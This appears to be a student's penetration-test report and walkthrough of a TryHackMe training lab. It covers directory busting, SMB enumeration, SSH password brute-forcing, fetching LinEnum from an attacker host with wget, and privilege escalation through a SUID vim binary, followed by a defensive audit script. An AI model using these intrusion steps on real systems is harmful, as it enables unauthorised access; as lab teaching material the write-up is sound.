
BY AHMAD ADRIANSYAH


VAPT Report

Basic Pentesting THM

A SIMULATION BY JOSIAH PIERCE FROM VULNHUB


Information

IP Target: 10.10.225.25

Executed in October 2023

Executive Summary

CREDITS: MR SYAIFUL ANDI, BSc., MSc.

Vulnerabilities | Severity | Status | Recommendation
Multiple Vulnerabilities in Apache Version 2.4.1.8 | Mixed Critical, High, Medium | Open | Update to the latest stable version
Directory Listing | Medium | Open | Disable directory listing on the Apache web server
Vulnerabilities in Samba Version 4.3.11 | High | Open | Update Samba to the latest stable version
Vulnerabilities in OpenSSH 7.2p2 | Medium | Open | Update OpenSSH to the latest stable version
Multiple Vulnerabilities in Kernel | High | Open | Update the kernel of the OS in use to the latest stable version
SSH Weak Password for Jan User | Medium | Open | Change Jan's password because it exists in a common dictionary list
Misconfigured Permission in Kay's Folder | Medium | Open | Fix the file permissions on the user's id_rsa private key
Weak Passphrase Used for Protecting SSH Private Key | Medium | Open | Use a strong passphrase to protect the user's id_rsa private key
HTTP Insecure Protocol Port 80 | Medium | Open | Use a safer protocol (HTTPS)


Turn on the Machine and Connect to the Network


OPEN PORTS AND FIND THE SERVICE

ACCESS HTTP (PORT 80)

OOPS! THERE IS A WEB SERVER RUNNING ON PORT 80

LOOK AT THE SOURCE CODE

CHECK DEV NOTE SECTION? LET’S FIND THE ALTERNATIVE

USING DIRBUSTER OR GOBUSTER

YEAY! WE FOUND THE HIDDEN DIRECTORY, CALLED DEVELOPMENT

USER BRUTE FORCING

THAT IS THE DEVELOPMENT PAGE, LET’S READ DEV.TXT AND J.TXT

READ THE DEV.TXT

ALRIGHT, FROM HERE WE KNOW THAT THE VERSION IS 2.5.12

READ THE J.TXT

GOT IT, WE FOUND A HINT THAT THE WEAK CREDENTIALS ARE IN /etc/shadow

ENUMERATE THE DISCOVERED SMB

WOW! THERE'S A LOT OF INFORMATION HERE.

WHAT’S THAT? WE CAN USE ‘’ AS USERNAME AND PASSWORD?

DISCOVERED TWO USER ACCOUNTS

HOORAY!

SUCCESSFULLY DISCOVERED TWO USER ACCOUNTS; THEY SEEM TO BELONG TO KAY AND JAN

BRUTEFORCING JAN’S ACCOUNT

YIPPEEE! WE SUCCESSFULLY CRACKED JAN'S SSH ACCESS

WE CAN SEE THAT JAN’S PASSWORD IS ARMANDO

ENUMERATE THE MACHINE TO FIND ANY VECTORS

FOR PRIVILEGE ESCALATION

WE NEED TO LOG IN TO JAN’S ACCOUNT

TYPE JAN’S PASSWORD TO CONTINUE

BINGO! WE ALSO FOUND KAY’S HOME DIRECTORY IN HERE

WHAT’S THAT? PASS.BAK? IS IT A BACKUP OR MAYBE A PASSWORD?

USE LINENUM

FOR PRIVILEGE ESCALATION

YOU CAN DOWNLOAD LINENUM FROM HERE

Start up a simple Python web server from the directory containing the new file: python -m http.server 8000

Download the file from the target machine: wget http://<attacker ip>:8000/LinEnum

You need to give yourself executable privileges on the file: chmod +x LinEnum

Run it!

CREDITS: JASPER ALBLAS

READ THE LINENUM ADMIN USER RESULT

WOW! KAY IS ALSO AN ADMINISTRATOR

WE CAN READ THE PASSWD, BUT NOT THE SHADOW

HMM, WE CAN SEE THAT VIM.BASIC IS A SUID FILE

RUN IT! WE CAN USE VIM TO READ THE PASS.BAK FILE FOUND EARLIER

FINALLY, WE CAN READ WHAT’S INSIDE THE PASS.BAK FILE
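The two findings behind this chain, a private key in a home directory readable by other users (the id_rsa recommendation in the summary table) and an editor such as vim.basic installed with the SUID bit, can both be caught by a short host audit. The script below is an added example written for this write-up, not part of the original deck or of LinEnum; the function names and the sample paths are my own.

```shell
#!/bin/sh
# Added audit helper (example code, not from the original slides).
# key_perms_ok FILE: returns 0 when FILE grants no group/other permission bits
# (mode 0600 or stricter), 1 otherwise or when FILE does not exist.
key_perms_ok() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    # stat prints the octal mode without a leading zero, e.g. 600, 644, 4755.
    # Reject any non-zero digit in the "group" or "other" position.
    case "$mode" in
        *[1-7]|*[1-7]?) return 1 ;;
        *)              return 0 ;;
    esac
}

# list_suid DIR: prints every regular file under DIR with the SUID bit set,
# one path per line (the same class of finding LinEnum reports as "SUID files").
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# suid_unexpected DIR: returns 0 and prints the offenders when a SUID file under
# DIR is an editor, shell or interpreter that lets the caller read or write
# arbitrary files as root (vim.basic in this report), 1 when none is found.
suid_unexpected() {
    list_suid "$1" | grep -E '/(vim|vim\.basic|vi|nano|less|more|python[0-9.]*|perl|bash|sh|find)$'
}

# audit KEY_FILE SUID_ROOT: run both checks and report; exit status is the
# number of failed checks so it can drive a cron job or CI gate.
audit() {
    failed=0
    if key_perms_ok "$1"; then
        echo "OK   private key $1 is owner-only"
    else
        echo "FAIL private key $1 is readable by others or missing"; failed=$((failed + 1))
    fi
    if offenders=$(suid_unexpected "$2"); then
        echo "FAIL unexpected SUID binaries under $2:"; echo "$offenders"; failed=$((failed + 1))
    else
        echo "OK   no editor/shell/interpreter with SUID under $2"
    fi
    return "$failed"
}

# Usage: sh audit.sh /home/kay/.ssh/id_rsa /usr/bin  (paths are illustrative)
if [ "$#" -ge 2 ]; then
    audit "$1" "$2"
fi
```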

THIS IS THE END OF THE SLIDE


AHMAD ADRIANSYAH
